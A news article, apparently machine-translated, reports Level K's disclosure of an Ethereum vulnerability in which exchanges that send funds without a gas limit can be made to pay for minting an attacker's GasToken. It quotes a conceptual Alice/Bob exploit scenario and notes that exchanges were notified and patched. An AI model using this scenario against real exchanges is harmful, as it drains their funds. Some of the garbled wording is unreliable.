Level K, the developer of DApp and Ethereum Smart contracts, recently discovered that there is a vulnerability on the Ethereum blockchain that allows hackers to coin GasToken in large quantities while receiving ETH. The information was published on 21 November. According to the company, at-risk exchanges of this attack have been notified. They made some changes to the software that would prevent such an attack, assuming that a bad actor tried to launch one.
GasToken vulnerability on the Ethereum blockchain
According to the report, the vulnerability window appears when the ether is sent to an address that is able to perform arbitrary calculations that have been paid by the sender of the transaction. This involves a risk of griefing. Griefing occurs when a bad actor is designed to damage the network. In theory, attackers will be able to trick the senders of transactions like exchanges for an amount of their choice if there are no current gas limit protection packages.
If you are cutting a variety of GasToken at the same time as the hacker receives ETH, you allow the attacker to profit from this situation.
The report states that the risk of coinage is not limited to ETH alone. Other Ethereum-based tokens such as ERC-20 and ERC-721 may be affected. During contract calls, which are made to activate the contracts, the stock exchanges that do not have a gas limit for their transactions may end up paying more than necessary for the calculation to the advantage of the attacker.
Part of the report states a hypothetical case study that is as follows:
"In an exploit scenario, Alice runs a cryptocurrency exchange and Bob plans to cause damage to Alice." Bob can easily initiate withdrawals by sending them to a contract address that is under his control. Computational fallback that is usually intensive If Alice does not set a gas limit, she will eventually pay the transaction fees from her wallet Bob, with enough transactions, can download the funds from Alice's wallet If Alice does not have a KYC policy Bob will be able to create different accounts and get around individual account withdrawal limits, and Bob can use GasTokens using his fallback function if he wants to make a profit while downloading Alice's wallet. "
Level K declares that all exchanges that may be affected by this attack have been notified in private and encouraged to take precautions against possible attacks. They have sent this notification to the largest possible number of cryptocurrant exchanges. These exchanges have implemented patches. From the moment the first report reached the public, Level K has published more information on the vulnerability and on the actions that can be taken to contain it.